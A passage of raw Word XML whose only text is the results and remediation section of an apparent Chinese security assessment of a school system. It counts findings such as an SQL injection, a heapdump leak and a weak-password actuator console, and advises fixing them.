                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842000" cy="3131185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:p w14:paraId="6FB3B14E">
      <w:pPr>
        <w:pStyle w:val="style4097"/>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA5F106">
      <w:pPr>
        <w:pStyle w:val="style4097"/>
        <w:spacing w:before="120"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081C5E68">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（三）成果说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E6C7C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874AD70">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>heapdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆栈泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E53BD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个弱口令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>actuator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F6063">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633190ED">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16275</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条全校师生敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91C190">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BBBFFB">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（四）处置建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0ADAA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3366A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加鉴权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB4A4F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入代码</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId11"/>
      <w:headerReference w:type="default" r:id="rId12"/>
      <w:footerReference w:type="even" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:headerReference w:type="first" r:id="rId15"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1644" w:right="1644" w:bottom="1644" w:left="1644" w:header="851" w:footer="1247" w:gutter="0"/>
      <w:cols w:space="425"/>
      <w:docGrid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仿宋_GB2312">
    <w:altName w:val="仿宋"/>
    <w:panose1 w:val="02010609030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="等线">
    <w:altName w:val="DengXian"/>
    <w:panose1 w:val="02010600030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="0004000F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="黑体">
    <w:altName w:val="SimHei"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="楷体_GB2312">
    <w:altName w:val="楷体"/>
    <w:panose1 w:val="02010609030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="仿宋">
    <w:altName w:val="仿宋"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA"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 w:name="方正小标宋简体">
    <w:altName w:val="黑体"/>
    <w:panose1 w:val="03000509000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="script"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Helvetica">
    <w:altName w:val="Helvetica"/>
    <w:panose1 w:val="020b0604020002020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="楷体">
    <w:altName w:val="楷体"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>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A3418F1">
    <w:pPr>
      <w:pStyle w:val="style32"/>
      <w:ind w:firstLine="280"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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D90CAA4">
    <w:pPr>
      <w:pStyle w:val="style32"/>
      <w:ind w:firstLine="280"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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EC7F0A4">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="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E1197E8">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="360"/>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B06E744">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="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5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evenAndOddHeaders/>
  <w:drawingGridHorizontalSpacing w:val="158"/>
  <w:drawingGridVerticalSpacing w:val="579"/>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0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:adjustRightInd w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:spacing w:lineRule="exact" w:line="580"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋_GB2312"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4100"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:eastAsia="黑体" w:hAnsi="等线"/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4101"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="楷体_GB2312"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4102"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4104"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4105"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4106"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0f4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4107"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4108"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4109"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线"/>
      <w:color w:val="59595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9"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4153"/>
        <w:tab w:val="right" w:leader="none" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240"/>
      <w:ind w:firstLine="100" w:firstLineChars="100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style31">
    <w:name w:val="header"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style31"/>
    <w:link w:val="style4098"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4153"/>
        <w:tab w:val="right" w:leader="none" w:pos="8306"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style19">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8834"/>
      </w:tabs>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:eastAsia="黑体"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style74">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4110"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:spacing w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线 Light" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线 Light"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="200" w:leftChars="200" w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="楷体_GB2312"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style62">
    <w:name w:val="Title"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4103"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="方正小标宋简体"/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="style154">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="style105"/>
    <w:next w:val="style154"/>
    <w:qFormat/>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41">
    <w:name w:val="page number"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style41"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:u w:val="none"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style85">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style85"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="style4097">
    <w:name w:val="章正文"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style4097"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:lineRule="auto" w:line="300"/>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4098">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4098"/>
    <w:link w:val="style31"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4099">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4099"/>
    <w:link w:val="style32"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4100">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4100"/>
    <w:link w:val="style1"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4101">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4101"/>
    <w:link w:val="style2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="楷体_GB2312" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4102">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4102"/>
    <w:link w:val="style3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style157">
    <w:name w:val="No Spacing"/>
    <w:next w:val="style157"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:adjustRightInd w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋_GB2312"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4103">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4103"/>
    <w:link w:val="style62"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="方正小标宋简体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4104">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4104"/>
    <w:link w:val="style4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="仿宋" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4105">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4105"/>
    <w:link w:val="style5"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4106">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4106"/>
    <w:link w:val="style6"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4107">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4107"/>
    <w:link w:val="style7"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4108">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4108"/>
    <w:link w:val="style8"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4109">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4109"/>
    <w:link w:val="style9"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="等线 Light"/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4110">
    <w:name w:val="副标题 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4110"/>
    <w:link w:val="style74"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:ascii="等线 Light" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线 Light"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style180">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4111"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4111">
    <w:name w:val="引用 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4111"/>
    <w:link w:val="style180"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style179">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style179"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4112">
    <w:name w:val="明显强调1"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4112"/>
    <w:qFormat/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style181">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4113"/>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13">
    <w:name w:val="明显引用 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4113"/>
    <w:link w:val="style181"/>
    <w:qFormat/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
